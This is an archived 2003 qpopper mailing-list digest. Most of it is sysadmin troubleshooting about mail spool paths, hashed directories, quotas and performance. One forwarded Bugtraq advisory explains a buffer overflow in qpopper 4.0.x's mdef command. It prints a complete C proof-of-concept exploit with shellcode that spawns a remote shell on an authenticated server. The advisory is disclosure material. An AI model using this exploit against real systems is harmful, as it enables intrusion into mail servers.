>>"ktrace"/"kdump" are Your Friends.
>>
>> - Greg
>
>Hi,
> I've tried Greg's suggestion and I need help deciphering the output:
>
># kdump | more
> 1219 popper RET read 6
> 1219 popper CALL setitimer(0,0xbfbfe5b0,0xbfbfe5a0)
> 1219 popper RET setitimer 0
> 1219 popper CALL sigaction(0xe,0xbfbfe598,0xbfbfe580)
> 1219 popper RET sigaction 0
> 1219 popper CALL getpid
> 1219 popper RET getpid 1219/0x4c3
> 1219 popper CALL __sysctl(0xbfbfe5c0,0x4,0,0,0x2811f700,0x2b)
> 1219 popper RET __sysctl 0
> 1219 popper CALL gettimeofday(0xbfbfd508,0)
> 1219 popper RET gettimeofday 0
> 1219 popper CALL gettimeofday(0xbfbfc5a8,0)
> 1219 popper RET gettimeofday 0
> 1219 popper CALL access(0x28118324,0x4)
> 1219 popper NAMI "/etc/localtime"
> 1219 popper RET access 0
> 1219 popper CALL open(0x28118324,0,0)
> 1219 popper NAMI "/etc/localtime"
> 1219 popper RET open 4
> 1219 popper CALL fstat(0x4,0xbfbfc480)
> 1219 popper RET fstat 0
> 1219 popper CALL read(0x4,0xbfbfa174,0x1f08)
> 1219 popper GIO fd 4 read 1218 bytes
>
>"TZif\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\^B\0\0\0\^B\0\0\0\0\0\0\0\M-f\0\0\0\^B\0\0\0\b\M^\\M-=\^A\M-p\M^\\
>
>\M-8\M^Sp\M^_\M-@1`\240\M^GX\M-x\M-!\M^Y\M^B\M-h\M-"\M^T\r\M-x\M-#_\^F\M-h\M-$s\M-h\M-p\M-%>\M-h\M-h\M-&S\M-J\M-p\M-'\^^\
>
>\M-J\M-h\M-*-\M-l\M-p\M-*\M-^\M^N\M-h\M-+\M-|\M-+p\M-,\M->p\M-h\M--\M-
><A LOT MORE OF THE ABOVE "non english" WAS DELETED FOR POSTING TO MAILIST>
> 1219 popper RET read 1218/0x4c2
> 1219 popper CALL close(0x4)
> 1219 popper RET close 0
> 1219 popper CALL getpid
> 1219 popper RET getpid 1219/0x4c3
> 1219 popper CALL socket(0x1,0x2,0)
> 1219 popper RET socket 4
> 1219 popper CALL fcntl(0x4,0x2,0x1)
> 1219 popper RET fcntl 0
> 1219 popper CALL connect(0x4,0xbfbfc554,0x6a)
> 1219 popper NAMI "/var/run/log"
> 1219 popper RET connect 0
> 1219 popper CALL sendto(0x4,0xbfbfca50,0x4c,0,0,0)
> 1219 popper GIO fd 4 wrote 76 bytes
> "<133>Mar 7 09:25:26 qpopper[1219]: Stats: shane 0 0 0 0
> localhost 127.0.0.1"
> 1219 popper RET sendto 76/0x4c
> 1219 popper CALL unlink(0xbfbfd410)
> 1219 popper NAMI "/var/mail/s/h/.shane.cache"
> 1219 popper RET unlink -1 errno 2 No such file or directory
> 1219 popper CALL ftruncate(0x3,0,0,0)
> 1219 popper RET ftruncate 0
> 1219 popper CALL unlink(0xbfbfec38)
> 1219 popper NAMI "/var/mail/s/h/.shane.pop"
> 1219 popper RET unlink 0
> 1219 popper CALL close(0x3)
> 1219 popper RET close 0
> 1219 popper CALL write(0,0x806f000,0x2a)
> 1219 popper GIO fd 0 wrote 42 bytes
> "+OK Pop server at localhost signing off.\r
> "
> 1219 popper RET write 42/0x2a
> 1219 popper CALL close(0x4)
> 1219 popper RET close 0
> 1219 popper CALL exit(0)
>
>I'm not sure what this is telling me. What directory is qpopper looking
>for my email? I see /var/mail/s/h/.shane.cache which I don't think should
>contain email and /var/mail/s/h/.shane.pop which is the temp file which is
>created when one checks email. I don't see anywhere in this dump that
>qpopper is looking for my mail in /var/mail/shane. With shane being a
>file with the following permissions:
>-rw------- 1 shane shane 980 Mar 6 17:10 shane
>
>Any suggestions would be appreciated,
>Shane
TSTAR Internet, Inc | Making the Net Work
Marble Falls, TX | Serving Blanco, Burnet,
830-693-6967 | Llano, and Mason Counties
Date: Fri, 07 Mar 2003 12:04:52 -0500
From: Shane Bywater <shane at apexia dot ca>
Subject: Re: H_e_l_p needed: qpopper doesn't see mail
I had tried manually moving the email to /var/mail/s/h but when I
did I was in "root" mode and therefore root owned the file. Therefore,
qpopper didn't "see" the file containing my email. After changing the
permission everything worked fine.
Anyone know off hand how to get sendmail 8.12.6 to use a hash
directory structure when delivering mail so that qpopper will find it where
it expects it to be? Or is it recommended just to not use the
--enable-hash-spool=2 parameter?
Thanks for your help,
Shane
At 10:39 AM 3/7/2003 -0600, you wrote:
>Read on page 14 in the Qpopper Guide documentation as it appears that you
>have set the hash-spool option.
>
>Butch
Subject: Re: H_e_l_p needed: qpopper doesn't see mail
Date: Fri, 07 Mar 2003 09:08:44 -0800
From: Greg Earle <earle at isolar.DynDNS dot ORG>
> At 04:01 PM 3/6/2003 -0800, you wrote:
>
>>Try using "ktrace" on the spawned qpopper daemon once you've made the
>>initial connection via telnet and gotten the "+OK Qpopper (version 4.0.4)"
>>banner.
>>
>>e.g. "cd /tmp ; sudo ktrace -d -i -p <pid-of-running-qpopper>"
>>
>>Once you've "quit" and the "qpopper" process has exited, run
>>
>>"cd /tmp ; sudo kdump | less" (or "more")
>>
>>and look at the output to see where "qpopper" went looking for your
>>"visible messages" once you authenticated to it.
>>
>>"ktrace"/"kdump" are Your Friends.
>>
>> - Greg
>
> Hi,
> I've tried Greg's suggestion and I need help deciphering the output:
>
> # kdump | more
> 1219 popper RET read 6
>
> [...]
>
> 1219 popper CALL socket(0x1,0x2,0)
> 1219 popper RET socket 4
> 1219 popper CALL fcntl(0x4,0x2,0x1)
> 1219 popper RET fcntl 0
> 1219 popper CALL connect(0x4,0xbfbfc554,0x6a)
> 1219 popper NAMI "/var/run/log"
> 1219 popper RET connect 0
> 1219 popper CALL sendto(0x4,0xbfbfca50,0x4c,0,0,0)
> 1219 popper GIO fd 4 wrote 76 bytes
> "<133>Mar 7 09:25:26 qpopper[1219]: Stats: shane 0 0 0 0 localhost
> 127.0.0.1"
I suspect Butch's suggestion will get you headed in the right direction,
but in the interim, looks to me like you attached the "ktrace" *after*
you'd already done the login to the Qpopper server via Telnet.
You want to attach it *as soon as you've made the initial Telnet connection
to the POP port*. As soon as you get the Qpopper greeting! *BEFORE* you
log in. I see nothing in your "kdump" output that shows the authentication
negotiation, or where Qpopper after authentication looked for your mail
spool file. You attached to it just before it dumped out the stats that
it found no messages.
- Greg
Subject: Re: H_e_l_p needed: qpopper doesn't see mail
Date: Fri, 07 Mar 2003 09:24:59 -0800
From: Greg Earle <earle at isolar.DynDNS dot ORG>
> I had tried manually moving the email to /var/mail/s/h but when I
> did I was in "root" mode and therefore root owned the file. Therefore,
> qpopper didn't "see" the file containing my email. After changing the
> permission everything worked fine.
> Anyone know off hand how to get sendmail 8.12.6 to use a hash
> directory structure when delivering mail so that qpopper will find it where
> it expects it to be? Or is it recommended just to not use the
> --enable-hash-spool=2 parameter?
Sendmail doesn't deliver mail. It hands off local mail to a mailer
(e.g. "/bin/mail", "/usr/local/bin/procmail", or somesuch) for local
spool delivery. Look for "Mlocal" in your "sendmail.cf" configuration
file to see how yours is set up.
And you should be running Sendmail 8.12.8, not 8.12.6, to get the
security fix for the hole that's out there in the wild now ...
- Greg
From: Mark <admin at asarian-host dot net>
Date: Sat, 08 Mar 2003 06:51:27 GMT
Subject: Re: H_e_l_p needed: qpopper doesn't see mail
----- Original Message -----
From: "Greg Earle" <earle at isolar.DynDNS dot ORG>
To: "Shane Bywater" <shane at apexia dot ca>
Cc: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Friday, March 07, 2003 7:11 PM
Subject: Re: H_e_l_p needed: qpopper doesn't see mail
>
> And you should be running Sendmail 8.12.8, not 8.12.6, to get
> the security fix for the hole that's out there in the wild now ...
And your mail appears to come from "isolar.DynDNS.ORG (8.9.3+3.2W/8.9.3)".
What's up with that? :)
- Mark
From: Gustavo Moyano <gustavo at infodoors.com dot ar>
Subject: --enable-home-dir-misc problems
Date: Mon, 10 Mar 2003 10:05:21 -0300
hello, I'm having problems with --enable-home-dir-misc option.
that don't work.
I type:
=2E/configure --help
and I didn't see the option.
What's the problem?
I have qpopper4.0.4.
Date: Mon, 10 Mar 2003 12:35:12 -0500
From: Steve Perrault <sperraul at mnsi dot net>
Subject: Migrating to hashed directories
Running Qpopper 4.0.4 on a Sun e450. Running in
servermode/standalone. I'm also using sendmail+procmail for
sending/delivery. We average between 150/170 POP3 sessions/min.
To tweak directory access, I'd like to migrate my user's mail files to the
2nd style of directory hashing
ie, ( /var/mail/biff => /var/mail/b/i/biff )
I know the safest way would be to take down mail while I merely copy files,
but I'd prefer to avoid any interruption.
I see qpopper has a safety feature where it will look for the unhashed file
by default when hashing is activated. Does this mean it will merge email
from 4 different files into one file when the users checks email? (the 4
files being both hashed and unhashed mail files and hashed/unhashed .pop files)
- SteveP
Date: Mon, 10 Mar 2003 11:09:56 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: --enable-home-dir-misc problems
On Mon, 10 Mar 2003, Gustavo Moyano wrote:
> hello, I'm having problems with --enable-home-dir-misc option.
>
> that don't work.
>
> I type:
>
> ./configure --help
>
> and I didn't see the option.
>
> What's the problem?
>
there is no problem. that option doesn't exist in 4.0.4
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Date: Mon, 10 Mar 2003 11:14:53 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: Migrating to hashed directories
On Mon, 10 Mar 2003, Steve Perrault wrote:
>
> I see qpopper has a safety feature where it will look for the unhashed file
> by default when hashing is activated. Does this mean it will merge email
> from 4 different files into one file when the users checks email? (the 4
> files being both hashed and unhashed mail files and hashed/unhashed .pop files)
>
don't know about the first two myself, but I'm assuming for the last
two, it wouldn't look for/merge unhashed .pop files, because why would you
have unhashed .pop files lying around in the first place? they get
removed after a session closes. it would just created a new .pop file in
the hashed structure when a new session started.
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Date: Mon, 10 Mar 2003 11:21:34 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: Indispensable admins (was Re: QPOPPER SENDMAIL/PROCMAIL: AND
On Thu, 6 Mar 2003, Homer Wilson Smith wrote:
>
> Hi Tony,
>
> I am unable to get the patch to cleanly patch against qpopper 4.0.4.
>
> If put into the qpopper directory itself it fails.
>
> If put into one directory out of the qpopper directory it seems
> to work but places the patched files in that outer directory rather
> than where they belong.
>
sorry for the delay. i was out of state for a few days.
well, what process (specifically) are you doing for the patching? it
should be something LIKE..
[src]# wget
ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper4.0.4.tar.gz
[src]# tar xfz qpopper4.0.4.tar.gz
[src]# cd qpopper4.0.4
[qpopper4.0.4]# wget
http://asteroid-b612.org/software/qpopper-mysql/qpopper-mysql-0.9.patch
[qpopper4.0.4]# patch -p1 < qpopper-mysql-0.9.patch
patching file README.MAILDIR
patching file README.MYSQL
patching file config.h.in
patching file configure
patching file configure.in
patching file doc/Changes.MAILDIR
patching file doc/Changes.MYSQL
patching file example-maildir-configure.txt
patching file example-mysql-configure.txt
patching file mysql-popper.conf
patching file popper/Makefile.in
patching file popper/genpath.c
patching file popper/maildir.c
patching file popper/maildir.h
patching file popper/pop_conf.c
patching file popper/pop_config.c
patching file popper/pop_dropcopy.c
patching file popper/pop_init.c
patching file popper/pop_list.c
patching file popper/pop_pass.c
patching file popper/pop_send.c
patching file popper/pop_uidl.c
patching file popper/pop_updt.c
patching file popper/pop_user.c
patching file popper/popper.c
patching file popper/popper.h
patching file popper/version.h
patching file popper/xtnd_xlst.c
then your configure, make, blah blah
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
> Perhaps I am just a confused newbie, but I would really
> love to try this out...
>
> Thanks Homer
>
> ------------------------------------------------------------------------
> Homer Wilson Smith The Paths of Lovers Art Matrix - Lightlink
> (607) 277-0959 KC2ITF Cross Internet Access, Ithaca NY
> homer at lightlink.com In the Line of Duty http://www.lightlink dot com
>
> On Thu, 27 Feb 2003, The Little Prince wrote:
>
> > On Thu, 27 Feb 2003, Chuck Yerkes wrote:
> >
> > > >
> > > > my boss always used to tell me..man, if you ever got hit by a bus, we'd be
> > > > dead. kinda makes you feel like one of those metal briefcases people
> > > > handcuff to their wrists.
> > >
> > > Yeah, I had guys who'd wack something together (and used to be one
> > > of those). But the "hit by a bus" can also be pronounced "take a vacation".
> >
> > heh, yeah, take a vacation is a totally interchangeable phrase
> > i didn't mean to give to give the impression i LIKED being that
> > highly-dependable person.
> > personally, i hate being the lynch pin. pager every weekend, 2am
> > pages, blah blah. we all wear our many hats.
> > but, you know, it was a start-up. profits were slim, budget tight.
> > i work a lot better when there's a few admins around..don't feel so
> > needed.
> >
> > --Tony
> > .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
> > Anthony J. Biacco Network Administrator/Engineer
> > thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
> >
> > "This will prove a brave kingdom to me,
> > where I shall have my music for nothing"
> > .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
> >
>
>
Date: Mon, 10 Mar 2003 11:24:47 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: Mailbox corrupt by disk quota
On Thu, 6 Mar 2003, Chris Miller wrote:
>
> The bottom line is that I need a pop server that plays nicely with quotas,
> corrupted mailboxes cause too many support issues. Customers get upset
> even though they created their own problem by turning on options they
> don't understand (leave mail on server). It would be nice to see a built
> in quota feature, or a locking option in a future release of qpopper that
> would solve this problem.
>
> Writing scripts to police mailboxes might be a nice warning feature for
> our customers (something I considered) but it's not a solution for corrupt
> mailboxes. If qpopper can't write the file out to a filesystem, it should
> leave the file behind in the temp drop. Corrupting files is not what I
> would consider "failing gracefully".
>
you could always use Maildir/ maildrop format, eliminating the need for
server mode/.pop files.
there might be other factors involved for your setup that void this (your
LDA won't support it, etc..), but it's an option, in general, nonetheless.
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
>
> On Thu, 6 Mar 2003, Chuck Yerkes wrote:
>
> > System quotae were intended to keep users from storing too
> > much on the machines in their HOME DIRECTORIES.
> >
> > That was the intent of quota systems.
> >
> > So we can use it as a hack to limit mailboxes size. But recall
> > that it's a hack, so we have to work around some of the quota intent
> > of offering a hard ceiling. Users don't duplicate their home
> > directories a lot.
> >
> > The Right Answer is not to (mis)use the system quotae, but rather,
> > put the checking in the delivery agent and let it use the soft
> > quota as an advisory - you could get the info from LDAP if you
> > wanted. But it's work on your part, at this moment.
> >
> > Quoting Alan Brown (alanb at digistar dot com):
> > > On Thu, 6 Mar 2003, Chuck Yerkes wrote:
> > >
> > > > However, using the disk system to enforce mail quota's is inherently
> > > > a hack, given that there will be, for a moment, two spools.
> > >
> > > The only way around system quotas is to have the files in 2 different
> > > partitions, but that is a _huge_ performance hit.
> > >
> > > Server mode makes user.pop handling a lot safer, but you need to ensure
> > > that there is no direct access to the spool (eg, pine or mail) (Pine can
> > > be configured to use pop in /etc/pine.conf or /etc/pine.conf.fixed), or
> > > the direct access program.
> > >
> > > As Chuck says, pop is not designed for a lot of this high-end stuff.
> > >
> > > AB
> > >
> >
>
>
--
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Date: Tue, 11 Mar 2003 09:09:14 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: QPopper 4.0.x buffer overflow vulnerability (fwd)
---------- Forwarded message ----------
Date: Mon, 10 Mar 2003 15:31:34 +0100
From: Florian Heinz <heinz at cronon-ag dot de>
To: bugtraq at securityfocus dot com
Subject: QPopper 4.0.x buffer overflow vulnerability
Hello,
Under certain conditions it is possible to execute arbitrary code using
a buffer overflow in the recent qpopper.
You need a valid username/password-combination and code is (depending on
the setup) usually executed with the user's uid and gid mail.
Explanation:
Qualcomm provides their own vsnprintf-implementation Qvsnprintf(). This
function is used unconditionally on any system, regardless if the system
has its own vsnprintf().
The function correctly writes up to 'n' bytes into the buffer, but fails
to null-terminate it, if buffer-space runs out while copying the
format-string (so the obvious fix is, null-terminate the buffer in
Qvsnprintf()).
This is a problem in pop_msg() (popper/pop_msg.c).
The call to Qvsnprintf() can leave the buffer 'message' unterminated, so
the successive call to strcat (strcat(message,"\r\n")) writes somewhere
into thew stack. What it exactly overwrites depends heavily on the
individual binary and the current stack-data (where is the next
null-byte).
I successfully managed to execute arbitrary code using the
'mdef'-command with the binary in the most recent debian-package
'qpopper-4.0.4-8'
Sending 'mdef <macroname>()' with a macro-name of about 1000 bytes
fills the buffer leaving it unterminated. The strcat overwrites the
least significant byte of the saved basepointer on the stack,
now pointing inside the buffer. On return of pop_mdef() (file
pop_extend.c), the return-address is now fetched from within our buffer
(and of course pointing inside our buffer), allowing to, for example,
spawn a shell.
The Macroname may not include bytes causing isspace() to return true
and, of course, no null-byte, so shellcode must be appropriate crafted.
I have tested the qpopper from SuSE 8.1 too, the flaw exists too, but
SuSE is more lucky, strcat doesn't overwrite critical values. I have
not yet tested other distributions.
Here is a POC-exploit, Values for RETADDR and BUFSIZE adjusted for
debian qpopper-4.0.4-8:
-- snip --
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
char *sc = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x08\x40"
"\x40\x40\xcd\x80";
#define BUFLEN 1006
#define RETLEN 148
#define RETADDR 0xbfffd304
int main (int argc, char **argv) {
int fd, len, i, retaddr = RETADDR;
char *bp, buf[2000];
struct sockaddr_in peer;
fd_set fs;
if (argc != 4) {
fprintf(stderr, "Usage: %s <ip> <user> <pass>\n\n", argv[0]);
exit(EXIT_FAILURE);
}
peer.sin_family = AF_INET;
peer.sin_port = htons(110);
peer.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
if (connect(fd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
exit(EXIT_FAILURE);
}
snprintf(buf, 1024, "USER %s\n", argv[2]);
write(fd, buf, strlen(buf));
snprintf(buf, 1024, "PASS %s\n", argv[3]);
write(fd, buf, strlen(buf));
memset(buf, 0x90, 2000);
memcpy(buf, "mdef ", 5);
memcpy(buf + BUFLEN - RETLEN - strlen(sc), sc, strlen(sc));
bp = (char *) (((unsigned int)(buf + BUFLEN - RETLEN)) & 0xfffffffc);
for (i = 0; i < RETLEN; i += 4)
memcpy(bp+i+2, &retaddr, sizeof(int));
buf[BUFLEN-2] = '(';
buf[BUFLEN-1] = ')';
buf[BUFLEN] = '\n';
write(fd, buf, BUFLEN+1);
while (1) {
FD_ZERO(&fs);
FD_SET(0, &fs);
FD_SET(fd, &fs);
select(fd+1, &fs, NULL, NULL, NULL);
if (FD_ISSET(0, &fs)) {
if ((len = read(0, buf, 1000)) <= 0)
break;
write(fd, buf, len);
} else {
if ((len = read(fd, buf, 1000)) <= 0)
break;
write(1, buf, len);
}
}
exit(EXIT_SUCCESS);
}
-- snap --
This is the short version. An enhanced version with error-checking,
bufsize- and return-address autodetection can be found on
http://nstx.dereference.de/snippets/qex.c
Feedback is welcome.
regards,
Florian Heinz
Cronon AG
http://www.cronon.org
PS: sorry for the bad english ;)
Subject: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Date: Tue, 11 Mar 2003 09:49:48 -0800
From: Greg Earle <earle at isolar.DynDNS dot ORG>
OK, I'm embarrassed to ask such a newbie question, but ... here goes.
I run a small departmental POP server at work. It serves maybe, oh, around
70-100 people or so (just guessing). (So, to get ahead of myself a bit,
we don't really have enough people - read: entries in "/var/mail" - for
me to think that going to some two-level hash directory setup in the
spool will help me with my problem very much. Read on ... )
It's running Qpopper 4.0.4 on a SPARCserver 20/71 with 128 Mbytes of RAM.
(Yes, I know. It's vastly underpowered.) running Solaris 7 11/99.
Under "normal" circumstances, the machine isn't really loaded. Relatively
speaking, POP usage is somewhat light.
But we have these few recalcitrant users who don't seem to know that "Keep
Messages On The Server" is bad. Really Bad. Especially when these few
people have mail spool files that are over 50 Mbytes in size. Some of
them even closer to 100 Mbytes (or over).
Naturally, every time these people POP in, the system goes into complete
I/O and CPU starvation mode as all cycles get used up copying their huge
mail spools to /var/mail/.luser.pop and then back again to /var/mail/luser.
We have a 500 MHz Sun Blade 100 with 1 Gbyte of RAM running Solaris 8 2/02
in the on-deck circle. It'll run a full-fledged POP/IMAP/WebMail server
with SPAM filtering, yadda yadda. But I haven't had time to get that
running yet - too many other fires to put out first. (Always the story,
isn't it?)
In the interim, are there any steps I can take with Qpopper 4.0.4 to
address this copy-to-.luser.pop-and-back-to-luser spool-file overhead problem?
Thanks in advance.
- Greg
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Date: Tue, 11 Mar 2003 10:03:04 -0800
From: Greg Earle <earle at isolar.DynDNS dot ORG>
I wrote:
> OK, I'm embarrassed to ask such a newbie question, but ... here goes.
>
> I run a small departmental POP server at work. It serves maybe, oh, around
> 70-100 people or so (just guessing). (So, to get ahead of myself a bit,
> we don't really have enough people - read: entries in "/var/mail" - for
> me to think that going to some two-level hash directory setup in the
> spool will help me with my problem very much. Read on ... )
I forgot to add something important: "/var/mail" is NFS-mounted onto most
every machine, as there are people still using things like the CDE "dtmail"
MailTool, and ELM, Mutt, Mush, and so on, to read their mail "directly"
over NFS. So, using "server mode" is, unfortunately, pretty much out.
(Yes, I know - it's an old, old setup that has been around for years.)
(If we're going to force people to use POP/IMAP or some other access that
doesn't let them get onto the server or NFS mount the spool, that'll have
to be done as part of the migration to the future e-mail setup, not now.)
Thanks,
- Greg
Date: Tue, 11 Mar 2003 10:18:52 -0800 (PST)
From: Gregory Hicks <ghicks at cadence dot com>
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
I basically had the same problem except with a Sun 3500 with 2K+ users...
enable-temp-drop-dir,
enable-servermode,
enable-keep-temp-drop,
and
enable-cache-dir
Your throughput should increase AFTER the next time those user login
since popper will just be keeping track of the changes...
Regards,
Gregory Hicks
> To: Subscribers of Qpopper <qpopper at lists.pensive dot org>
> Subject: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
> Date: Tue, 11 Mar 2003 09:49:48 -0800
> From: Greg Earle <earle at isolar.dyndns dot org>
>
> OK, I'm embarrassed to ask such a newbie question, but ... here goes.
>
> I run a small departmental POP server at work. It serves maybe, oh, around
> 70-100 people or so (just guessing). (So, to get ahead of myself a bit,
> we don't really have enough people - read: entries in "/var/mail" - for
> me to think that going to some two-level hash directory setup in the
> spool will help me with my problem very much. Read on ... )
>
> It's running Qpopper 4.0.4 on a SPARCserver 20/71 with 128 Mbytes of RAM.
> (Yes, I know. It's vastly underpowered.) running Solaris 7 11/99.
>
> Under "normal" circumstances, the machine isn't really loaded. Relatively
> speaking, POP usage is somewhat light.
>
> But we have these few recalcitrant users who don't seem to know that "Keep
> Messages On The Server" is bad. Really Bad. Especially when these few
> people have mail spool files that are over 50 Mbytes in size. Some of
> them even closer to 100 Mbytes (or over).
>
> Naturally, every time these people POP in, the system goes into complete
> I/O and CPU starvation mode as all cycles get used up copying their huge
> mail spools to /var/mail/.luser.pop and then back again to /var/mail/luser.
>
> We have a 500 MHz Sun Blade 100 with 1 Gbyte of RAM running Solaris 8 2/02
> in the on-deck circle. It'll run a full-fledged POP/IMAP/WebMail server
> with SPAM filtering, yadda yadda. But I haven't had time to get that
> running yet - too many other fires to put out first. (Always the story,
> isn't it?)
>
> In the interim, are there any steps I can take with Qpopper 4.0.4 to
> address this copy-to-.luser.pop-and-back-to-luser spool-file overhead problem?
>
> Thanks in advance.
>
> - Greg
>
>
-------------------------------------------------------------------
Gregory Hicks | Principal Systems Engineer
Cadence Design Systems | Direct: 408.576.3609
555 River Oaks Pkwy M/S 6B1 | Fax: 408.894.3400
San Jose, CA 95134 | Internet: ghicks at cadence dot com
"The trouble with doing anything right the first time is that nobody
appreciates how difficult it was."
When a team of dedicated individuals makes a commitment to act as
one... the sky's the limit.
Just because "We've always done it that way" is not necessarily a good
reason to continue to do so... Grace Hopper, Rear Admiral, United
States Navy
Date: Tue, 11 Mar 2003 13:09:58 -0500
From: Tim Meader <tmeader at cne-odin.gsfc.nasa dot gov>
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O
--=====================_506101937==.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed
Recompile qpopper with the options...
--enable-servermode and if possible --enable-fast-update
(note, there is a slight risk of problems using either or both of these if
people are accessing their mailspools directly as well, such as through
PINE or MUTT. Check the qpopper pdf file on the website for more info).
Also consider moving your temp drop directory to a different disk than the
one the spool is on. You can redirect it with the
--enable-temp-drop-dir=<directory>
option. Note that this directory MUST have the same ownership and
permissions as your maildrop directory.
Hope this helps some.
At 09:49 AM 3/11/2003 -0800, Greg Earle wrote:
>OK, I'm embarrassed to ask such a newbie question, but ... here goes.
>
>I run a small departmental POP server at work. It serves maybe, oh, around
>70-100 people or so (just guessing). (So, to get ahead of myself a bit,
>we don't really have enough people - read: entries in "/var/mail" - for
>me to think that going to some two-level hash directory setup in the
>spool will help me with my problem very much. Read on ... )
>
>It's running Qpopper 4.0.4 on a SPARCserver 20/71 with 128 Mbytes of RAM.
>(Yes, I know. It's vastly underpowered.) running Solaris 7 11/99.
>
>Under "normal" circumstances, the machine isn't really loaded. Relatively
>speaking, POP usage is somewhat light.
>
>But we have these few recalcitrant users who don't seem to know that "Keep
>Messages On The Server" is bad. Really Bad. Especially when these few
>people have mail spool files that are over 50 Mbytes in size. Some of
>them even closer to 100 Mbytes (or over).
>
>Naturally, every time these people POP in, the system goes into complete
>I/O and CPU starvation mode as all cycles get used up copying their huge
>mail spools to /var/mail/.luser.pop and then back again to /var/mail/luser.
>
>We have a 500 MHz Sun Blade 100 with 1 Gbyte of RAM running Solaris 8 2/02
>in the on-deck circle. It'll run a full-fledged POP/IMAP/WebMail server
>with SPAM filtering, yadda yadda. But I haven't had time to get that
>running yet - too many other fires to put out first. (Always the story,
>isn't it?)
>
>In the interim, are there any steps I can take with Qpopper 4.0.4 to
>address this copy-to-.luser.pop-and-back-to-luser spool-file overhead problem?
>
>Thanks in advance.
>
> - Greg
---
Tim Meader
ODIN Unix Group
ACS Government Services, Inc. - (301) 286-8013
tmeader at cne-odin.gsfc.nasa dot gov
--=====================_506101937==.ALT
Content-Type: text/html; charset="us-ascii"
<html>
<body>
<font size=3>Recompile qpopper with the options...<br><br>
--enable-servermode and if
possible --enable-fast-update
<br><br>
(note, there is a slight risk of problems using either or both of these
if people are accessing their mailspools directly as well, such as
through PINE or MUTT. Check the qpopper pdf file on the website for more
info).<br><br>
Also consider moving your temp drop directory to a different disk than
the one the spool is on. You can redirect it with the<br><br>
--enable-temp-drop-dir=<directory><br><br>
option. Note that this directory MUST have the same ownership and
permissions as your maildrop directory.<br><br>
Hope this helps some.<br><br>
At 09:49 AM 3/11/2003 -0800, Greg Earle wrote:<br>
<blockquote type=cite class=cite cite>OK, I'm embarrassed to ask such a
newbie question, but ... here goes.<br><br>
I run a small departmental POP server at work. It serves maybe, oh,
around<br>
70-100 people or so (just guessing). (So, to get ahead of myself a
bit,<br>
we don't really have enough people - read: entries in
"/var/mail" - for<br>
me to think that going to some two-level hash directory setup in
the<br>
spool will help me with my problem very much. Read on ...
)<br><br>
It's running Qpopper 4.0.4 on a SPARCserver 20/71 with 128 Mbytes of
RAM.<br>
(Yes, I know. It's vastly underpowered.) running Solaris 7
11/99.<br><br>
Under "normal" circumstances, the machine isn't really
loaded. Relatively<br>
speaking, POP usage is somewhat light.<br><br>
But we have these few recalcitrant users who don't seem to know that
"Keep<br>
